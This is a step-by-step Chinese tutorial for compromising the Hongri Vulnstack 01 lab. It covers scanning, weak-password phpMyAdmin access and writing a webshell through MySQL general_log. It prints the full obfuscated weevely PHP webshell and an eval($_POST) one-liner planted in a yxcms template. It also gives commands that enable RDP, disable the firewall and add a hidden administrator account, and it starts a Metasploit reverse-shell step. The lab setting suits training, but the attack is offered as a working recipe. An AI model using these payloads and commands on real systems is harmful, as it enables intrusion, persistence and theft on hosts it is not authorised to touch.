【内网攻防实战】红日靶场01(超超超超超超详细!!实操+AI问答,胎教级教程)

红日靶场(一)


靶场下载与说明

下载

红日靶场官网
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

说明

  • 靶场默认密码
    hongrisec@2019

  • 预留空间
    【攻击机Kail_2023.3】70G
    【靶场win7】32G
    【靶场Win2K3 】11G
    【靶场winserver08】23G


环境搭建

虚拟机网络编辑器

修改VMnet1、VMnet2这两张网卡的地址

在这里插入图片描述

cmd查看网卡确保已经生效

在这里插入图片描述

跳板机 Win 7(VMnet1 - 72.131、VMnet2 - 52.143)

提示密码过期,更改密码

在这里插入图片描述
在这里插入图片描述

首次登录后,需要再重启电脑,不然phpstudy可能无法启动。

在这里插入图片描述

重启后,进入C:\phpStudy 启动phpStudy

在这里插入图片描述

浏览器访问 http://127.0.0.1/
在这里插入图片描述

cmd 查本机 ip
在这里插入图片描述

域内主机 Win2K3(VMnet2 - 52.141)

在这里插入图片描述

域控 Server 2008 R2(VMnet2 - 52.138)

提示过期,改密码
在这里插入图片描述

更改密码为hongri@2024
在这里插入图片描述
在这里插入图片描述

攻击机 Kail_2023.3(NAT - 196.123、VMnet1 - 72.200)

NAT网卡官方文档没写,但是考虑Kail作为攻击机,可能用的工具系统没有,所以加了一张方便连到公网下载工具。

如果添加网卡后,显示DOWN或者ip无法获取,如下:
在这里插入图片描述

编辑/etc/network/interfaces 改为static,重启网络

┌──(root㉿kali)-[~]
└─# vi /etc/network/interfaces 
                                                                                                                           
┌──(root㉿kali)-[~]
└─# /etc/init.d/networking restart
Restarting networking (via systemctl): networking.service.   
                                                                                                                           
┌──(root㉿kali)-[~]
└─# ip a                          
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host proto kernel_lo 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:fa:4e:d4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.196.3/24 brd 192.168.196.255 scope global dynamic noprefixroute eth0
       valid_lft 1796sec preferred_lft 1796sec
    inet6 fe80::20c:29ff:fefa:4ed4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:fa:4e:de brd ff:ff:ff:ff:ff:ff
    inet 192.168.72.200/24 brd 192.168.72.255 scope global eth1
       valid_lft forever preferred_lft forever
                                                                                                                           
┌──(root㉿kali)-[~]
└─# ping www.badiu.com
PING www.badiu.com (67.227.226.240) 56(84) bytes of data.
64 bytes from lb01.parklogic.com (67.227.226.240): icmp_seq=1 ttl=128 time=306 ms
64 bytes from lb01.parklogic.com (67.227.226.240): icmp_seq=2 ttl=128 time=298 ms
64 bytes from lb01.parklogic.com (67.227.226.240): icmp_seq=3 ttl=128 time=289 ms
64 bytes from lb01.parklogic.com (67.227.226.240): icmp_seq=4 ttl=128 time=294 ms
^Z
zsh: suspended  ping www.badiu.com
                                                                                                                           
┌──(root㉿kali)-[~]
└─# cat /etc/network/interfaces 
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).


source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.196.123
netmask 255.255.255.0
geteway 192.168.196.111

auto eth1
iface eth1 inet static
address 192.168.72.200
netmask 255.255.255.0
geteway 192.168.72.2
                                                                                                                           
┌──(root㉿kali)-[~]
└─# 

快照------------------------------------------------------------

至此,环境搭建完成,记得给所有机子拍初始快照!!

拓扑图

在这里插入图片描述

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

Kail进入phpadmin后台

扫描72.0网段

┌──(root㉿kali)-[~]
└─# nmap 192.168.72.0/24           
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-30 00:45 HKT
Nmap scan report for 192.168.72.1
Host is up (0.00092s latency).
All 1000 scanned ports on 192.168.72.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:01 (VMware)

Nmap scan report for 192.168.72.131
Host is up (0.00019s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:05:03:81 (VMware)

Nmap scan report for 192.168.72.254
Host is up (0.00013s latency).
All 1000 scanned ports on 192.168.72.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:F3:AF:4C (VMware)

Nmap scan report for 192.168.72.200
Host is up (0.0000030s latency).
All 1000 scanned ports on 192.168.72.200 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 256 IP addresses (4 hosts up) scanned in 12.03 seconds
                                                                                                                                      
┌──(root㉿kali)-[~]

在这里插入图片描述

扫描80,3306端口

┌──(root㉿kali)-[~]
└─# nmap 192.168.72.131 -p80,3306 -A -sV

Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-30 01:06 HKT
Nmap scan report for 192.168.72.131
Host is up (0.00033s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:05:03:81 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 8.1 R1 (96%), Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows 7 Professional or Windows 8 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 (90%), Microsoft Windows Server 2008 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.72.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.75 seconds
                                                                                                                                                      

在这里插入图片描述

扫描网站目录

┌──(root㉿kali)-[~]
└─# dirb http://192.168.72.131


-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May 30 01:06:51 2024
URL_BASE: http://192.168.72.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.72.131/ ----
+ http://192.168.72.131/aux (CODE:403|SIZE:212)                                                                                       
+ http://192.168.72.131/com1 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/com2 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/com3 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/con (CODE:403|SIZE:212)                                                                                       
+ http://192.168.72.131/lpt1 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/lpt2 (CODE:403|SIZE:213)                                                                                      
+ http://192.168.72.131/nul (CODE:403|SIZE:212)                                                                                       
+ http://192.168.72.131/phpinfo.php (CODE:200|SIZE:71475)                                                                             
==> DIRECTORY: http://192.168.72.131/phpmyadmin/                                                                                      
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/                                                                                      
+ http://192.168.72.131/prn (CODE:403|SIZE:212)                                                                                       
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/ ----
+ http://192.168.72.131/phpmyadmin/aux (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpmyadmin/changelog (CODE:200|SIZE:32593)                                                                    
+ http://192.168.72.131/phpmyadmin/ChangeLog (CODE:200|SIZE:32593)                                                                    
+ http://192.168.72.131/phpmyadmin/com1 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/com2 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/com3 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/con (CODE:403|SIZE:223)                                                                            
==> DIRECTORY: http://192.168.72.131/phpmyadmin/examples/                                                                             
+ http://192.168.72.131/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                                                  
+ http://192.168.72.131/phpmyadmin/index.php (CODE:200|SIZE:4378)                                                                     
==> DIRECTORY: http://192.168.72.131/phpmyadmin/js/                                                                                   
==> DIRECTORY: http://192.168.72.131/phpmyadmin/libraries/                                                                            
+ http://192.168.72.131/phpmyadmin/license (CODE:200|SIZE:18011)                                                                      
+ http://192.168.72.131/phpmyadmin/LICENSE (CODE:200|SIZE:18011)                                                                      
==> DIRECTORY: http://192.168.72.131/phpmyadmin/locale/                                                                               
+ http://192.168.72.131/phpmyadmin/lpt1 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/lpt2 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpmyadmin/nul (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpmyadmin/phpinfo.php (CODE:200|SIZE:4378)                                                                   
+ http://192.168.72.131/phpmyadmin/prn (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpmyadmin/readme (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpmyadmin/Readme (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpmyadmin/README (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpmyadmin/robots.txt (CODE:200|SIZE:26)                                                                      
==> DIRECTORY: http://192.168.72.131/phpmyadmin/setup/                                                                                
==> DIRECTORY: http://192.168.72.131/phpmyadmin/themes/                                                                               
==> DIRECTORY: http://192.168.72.131/phpmyadmin/Themes/                                                                               
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/ ----
+ http://192.168.72.131/phpMyAdmin/aux (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpMyAdmin/changelog (CODE:200|SIZE:32593)                                                                    
+ http://192.168.72.131/phpMyAdmin/ChangeLog (CODE:200|SIZE:32593)                                                                    
+ http://192.168.72.131/phpMyAdmin/com1 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/com2 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/com3 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/con (CODE:403|SIZE:223)                                                                            
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/examples/                                                                             
+ http://192.168.72.131/phpMyAdmin/favicon.ico (CODE:200|SIZE:18902)                                                                  
+ http://192.168.72.131/phpMyAdmin/index.php (CODE:200|SIZE:4378)                                                                     
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/js/                                                                                   
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/libraries/                                                                            
+ http://192.168.72.131/phpMyAdmin/license (CODE:200|SIZE:18011)                                                                      
+ http://192.168.72.131/phpMyAdmin/LICENSE (CODE:200|SIZE:18011)                                                                      
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/locale/                                                                               
+ http://192.168.72.131/phpMyAdmin/lpt1 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/lpt2 (CODE:403|SIZE:224)                                                                           
+ http://192.168.72.131/phpMyAdmin/nul (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpMyAdmin/phpinfo.php (CODE:200|SIZE:4378)                                                                   
+ http://192.168.72.131/phpMyAdmin/prn (CODE:403|SIZE:223)                                                                            
+ http://192.168.72.131/phpMyAdmin/readme (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpMyAdmin/Readme (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpMyAdmin/README (CODE:200|SIZE:2101)                                                                        
+ http://192.168.72.131/phpMyAdmin/robots.txt (CODE:200|SIZE:26)                                                                      
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/setup/                                                                                
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/themes/                                                                               
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/Themes/                                                                               
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/examples/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/setup/ ----
+ http://192.168.72.131/phpmyadmin/setup/aux (CODE:403|SIZE:229)                                                                      
+ http://192.168.72.131/phpmyadmin/setup/com1 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/com2 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/com3 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/con (CODE:403|SIZE:229)                                                                      
==> DIRECTORY: http://192.168.72.131/phpmyadmin/setup/frames/                                                                         
+ http://192.168.72.131/phpmyadmin/setup/index.php (CODE:200|SIZE:6820)                                                               
==> DIRECTORY: http://192.168.72.131/phpmyadmin/setup/lib/                                                                            
+ http://192.168.72.131/phpmyadmin/setup/lpt1 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/lpt2 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpmyadmin/setup/nul (CODE:403|SIZE:229)                                                                      
+ http://192.168.72.131/phpmyadmin/setup/prn (CODE:403|SIZE:229)                                                                      
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/Themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/examples/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/setup/ ----
+ http://192.168.72.131/phpMyAdmin/setup/aux (CODE:403|SIZE:229)                                                                      
+ http://192.168.72.131/phpMyAdmin/setup/com1 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/com2 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/com3 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/con (CODE:403|SIZE:229)                                                                      
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/setup/frames/                                                                         
+ http://192.168.72.131/phpMyAdmin/setup/index.php (CODE:200|SIZE:6820)                                                               
==> DIRECTORY: http://192.168.72.131/phpMyAdmin/setup/lib/                                                                            
+ http://192.168.72.131/phpMyAdmin/setup/lpt1 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/lpt2 (CODE:403|SIZE:230)                                                                     
+ http://192.168.72.131/phpMyAdmin/setup/nul (CODE:403|SIZE:229)                                                                      
+ http://192.168.72.131/phpMyAdmin/setup/prn (CODE:403|SIZE:229)                                                                      
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/Themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpmyadmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.72.131/phpMyAdmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu May 30 01:07:08 2024
DOWNLOADED: 23060 - FOUND: 70
                                                                                                                                       
┌──(root㉿kali)-[~]
└─# 

在这里插入图片描述

浏览器访问后台

浏览器访问: http://192.168.72.131/phpmyadmin/
在这里插入图片描述

尝试弱密码登录(成功进入后台!!)

在这里插入图片描述

日志导出getshell

sql查询日志

show variables like '%general%';

在这里插入图片描述
在这里插入图片描述

日志设置

设置文件位置
set global general_log_file ='C:\\phpStudy\\WWW\\shell.php' ;

查看

show variables like '%general%';

在这里插入图片描述

开启读写功能
SET GLOBAL general_log='on'; 

查看

show variables like '%general%';

在这里插入图片描述

weevely生成🐎

                                                                                                                           
┌──(root㉿kali)-[~]
└─#  weevely generate x ./shell.php
Generated './1.php' with password 'x' of 754 byte size.
                                                                                                                           
┌──(root㉿kali)-[~]
└─# cat shell.php               
<?php
$g='{$o.=Jk$t{$iJk}^Jk$k{$j};Jk}}JkreJkturn $o;}ifJk (@preg_mJkatcJkh("/$JkkhJk(.+)$kf/Jk",@file_get_coJkntenJkts("php:/J';
$v=str_replace('PF','','crPFPFeate_PFPFfuncPFPFtion');
$T='k/inJkpJkut"),$Jkm)==1) {@ob_starJktJk();@evaJkl(@gJkzunJkcompress(@x(@baJkseJk64_decodJke($m[1])Jk,$Jkk)));$o=@Jkob_gJk';
$c='Jket_cJkontents();@ob_Jkend_cleJkan();$rJk=@basJkJke64_encode(@xJk(@gzcoJkmpreJkss($oJk),$Jkk));prJkint("$p$kh$Jkr$kf");}';
$h='$k="9ddJk4e461";Jk$kJkh="268c803Jk4fJk5c8";$kf="5Jk64Jke155cJk67a6"Jk;$pJk="vOwpscpMt4b6Jk4FbA";fJkJkunction x(Jk$tJk';
$z=',$kJk){$c=strJklen($k);$l=sJktrJklen($Jkt);$o=""Jk;Jkfor($i=Jk0;$i<$Jkl;){for($JkJkj=0;($j<Jk$c&&$iJk<$l);$j++,$iJk++)';
$Z=str_replace('Jk','',$h.$z.$g.$T.$c);
$G=$v('',$Z);$G();
?>
                                                                                                                                      

sql语句注释添加🐎

select 1;/*

<?php
$g='{$o.=Jk$t{$iJk}^Jk$k{$j};Jk}}JkreJkturn $o;}ifJk (@preg_mJkatcJkh("/$JkkhJk(.+)$kf/Jk",@file_get_coJkntenJkts("php:/J';
$v=str_replace('PF','','crPFPFeate_PFPFfuncPFPFtion');
$T='k/inJkpJkut"),$Jkm)==1) {@ob_starJktJk();@evaJkl(@gJkzunJkcompress(@x(@baJkseJk64_decodJke($m[1])Jk,$Jkk)));$o=@Jkob_gJk';
$c='Jket_cJkontents();@ob_Jkend_cleJkan();$rJk=@basJkJke64_encode(@xJk(@gzcoJkmpreJkss($oJk),$Jkk));prJkint("$p$kh$Jkr$kf");}';
$h='$k="9ddJk4e461";Jk$kJkh="268c803Jk4fJk5c8";$kf="5Jk64Jke155cJk67a6"Jk;$pJk="vOwpscpMt4b6Jk4FbA";fJkJkunction x(Jk$tJk';
$z=',$kJk){$c=strJklen($k);$l=sJktrJklen($Jkt);$o=""Jk;Jkfor($i=Jk0;$i<$Jkl;){for($JkJkj=0;($j<Jk$c&&$iJk<$l);$j++,$iJk++)';
$Z=str_replace('Jk','',$h.$z.$g.$T.$c);
$G=$v('',$Z);$G();
?>

*/

在这里插入图片描述
在这里插入图片描述

查看🐎注入结果

浏览器访问:http://192.168.72.131/shell.php

在这里插入图片描述

Kail 链接🐎(成功拿下shell!!)

┌──(root㉿kali)-[~]
└─# weevely http://192.168.72.131/shell.php x  

[+] weevely 4.0.1

[+] Target:     192.168.72.131
[+] Session:    /root/.weevely/sessions/192.168.72.131/shell_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> whoami
god\administrator
stu1:C:\phpStudy\WWW $ 

在这里插入图片描述

远程登录Win 7

shell创建一个管理员账户

开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关防火墙

netsh firewall set opmode disable

添加账户、加进管理员组

net user

net user hack01 1324@cbD /add

net localgroup Administrators hack01 /add

net user 

在这里插入图片描述

rdesktop登录(成功登录win 7!!)

新开一个终端,ping测试防火墙是否关闭,rdesktop 远程连接3389

┌──(root㉿kali)-[~]
└─# ping 192.168.72.131         
PING 192.168.72.131 (192.168.72.131) 56(84) bytes of data.
64 bytes from 192.168.72.131: icmp_seq=1 ttl=128 time=9.13 ms
64 bytes from 192.168.72.131: icmp_seq=2 ttl=128 time=0.516 ms
64 bytes from 192.168.72.131: icmp_seq=3 ttl=128 time=0.969 ms
64 bytes from 192.168.72.131: icmp_seq=4 ttl=128 time=0.550 ms
64 bytes from 192.168.72.131: icmp_seq=5 ttl=128 time=0.422 ms
^Z
zsh: suspended  ping 192.168.72.131
                                                                                                                                      
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.72.131:3389

ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);

 1. Certificate issuer is not trusted by this system.

     Issuer: CN=stu1.god.org


Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:

    Subject: CN=stu1.god.org
     Issuer: CN=stu1.god.org
 Valid From: Wed May 29 09:05:59 2024
         To: Thu Nov 28 09:05:59 2024

  Certificate fingerprints:

       sha1: 04789b7d77a2bffae4470d276265fda35a3f6c54
     sha256: 9324cd26a0397ba1655a3d5bbd00b27e5a9b1280a8048dc8c0e6b0ddd366278a


Do you trust this certificate (yes/no)? yes

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

通过Win7拿到域内权限

Win7信息收集

新建用户hack01虽然拥有win7管理权限,但hack01只能查得到本机的信息,它没有域内的权限,无法利用cmd查询到关于域控的更多有效信息
在这里插入图片描述所以,我们现在要想办法拿到域内权限
在这里插入图片描述

访问:http://192.168.72.131/yxcms/

在这里插入图片描述

进入yxcms后台

访问: http://192.168.72.131/yxcms/index.php?r=admin/index/login
在这里插入图片描述

在这里插入图片描述

上传一句话🐎

在这里插入图片描述
在这里插入图片描述

 @eval($_POST['x']);
<?php 
@eval($_POST['x']);
return array (
  'name' => '最新默认模板2013-2-1',
  'author' => 'yx',
); ?> 

在这里插入图片描述

确认模板位置

通过yxcms的版本信息,可以搜索相关的项目,进一步确认模板在项目中的位置
在这里插入图片描述

浏览器访问: http://192.168.72.131/yxcms/protected/apps/default/view/default/info.php

在这里插入图片描述
这里是空白页

插件 hackbar

火狐安装Hackbar: https://addons.mozilla.org/zh-CN/firefox/addon/new-hackbar/

Hackbar 开启,填入下面的内容,run执行

http://192.168.72.131/yxcms/protected/apps/default/view/default/info.php

x=phpinfo();

在这里插入图片描述

哥斯拉(成功拿到域内账户的权限!!)

┌──(root㉿kali)-[~]
└─# cd Desktop
                                                                                                                                      
┌──(root㉿kali)-[~/Desktop]
└─# unzip godzilla.zip 
Archive:  godzilla.zip
  inflating: godzilla.jar            
                                                                                                                                      
┌──(root㉿kali)-[~/Desktop]
└─# java -jar godzilla.jar 

哥斯拉下载:https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla
这里jar包下载到win10会报毒,所以我是加密压缩后复制到kail解压的,kail自带java环境,可以运行jar包
在这里插入图片描述

哥斯拉添加shell

http://192.168.72.131/yxcms/protected/apps/default/view/default/info.php

在这里插入图片描述

先Test是否连接成功,然后再Add添加

在这里插入图片描述

在这里插入图片描述

可以看到这是一个域内用户
在这里插入图片描述
可以查到域内的用户
在这里插入图片描述
PS:如果net user /domain 看不到域内用户,别管它,kail、win开着,出去吃个饭。别问,问就是玄学!!

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

内网渗透

反弹shell

理论

以下内容来源AI问答:

反弹 Shell(Reverse Shell)
反弹 Shell 是一种技术,允许攻击者在受害者的计算机上执行远程命令。与传统的 Shell 不同,反弹 Shell 需要受害者的计算机主动连接到攻击者的计算机。这种连接通常是通过命令行工具(如 Netcat、nc、或脚本语言)实现的。以下是反弹 Shell 的一些特点:

  • 主动连接:受害者的计算机(客户端)主动发起连接到攻击者的计算机(服务器)。
  • 交互式控制:一旦建立连接,攻击者可以通过一个交互式的命令行界面控制受害者的计算机。
  • 简单实现:可以使用一行命令或简单的脚本实现反弹 Shell。
  • 用途多样:可以用于合法的远程管理,也可以用于非法的远程控制。

回连马是一类恶意软件,旨在在受害者的计算机上创建一个隐蔽的入口,允许攻击者远程控制或访问受害者的系统。回连马可以采取多种形式,包括但不限于反弹 Shell。以下是回连马的一些特点:

  • 隐蔽性:回连马设计得非常隐蔽,以避免被用户或安全软件发现。
  • 持久性:回连马通常具有持久性,能够在系统重启后继续存在。
  • 多种功能:除了创建反弹 Shell,回连马还可以执行其他恶意行为,如文件操作、键盘记录、下载其他恶意软件等。
  • 控制与通信:回连马可能包含一个命令和控制(C2)服务器,攻击者可以通过它来管理和控制受感染的计算机。

反弹 shell(Reverse Shell)和回连马(Backdoor,特别指反弹类型的Backdoor,通常称为Reverse Shell Backdoor或简称Reverse Backdoor)是网络安全领域中的两个概念,它们在某些方面相似,但也有区别:

  • 定义:反弹 Shell 是创建反向连接的一种具体技术,而回连马是包含多种技术的恶意软件类别。
  • 范围:反弹 Shell 主要关注于提供反向的命令行访问,而回连马可能包含更广泛的远程控制功能。
  • 目的:反弹 Shell 可以用于合法的远程管理(如系统管理员的远程维护),而回连马通常用于非法的远程控制和数据窃取。
  • 复杂性:回连马通常比单一的反弹 Shell 更加复杂,可能包含多个组件和功能。
    在实际使用中,反弹 Shell 可以被视为回连马的一种形式,但回连马的范围更广,包含了更多的功能和可能性。无论是反弹 Shell 还是回连马,它们都应在法律允许的范围内使用,通常是在获得授权的渗透测试和安全评估中。对于个人和组织来说,了解这些技术的原理和防御措施是非常重要的。
实践

msf生成回连马 64.exe ,上传到win,然后win终端执行回连马,使kai得到shell,方便调用msf 等其他模块。
在这里插入图片描述

┌──(root㉿kali)-[~]
└─# msfdb run
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
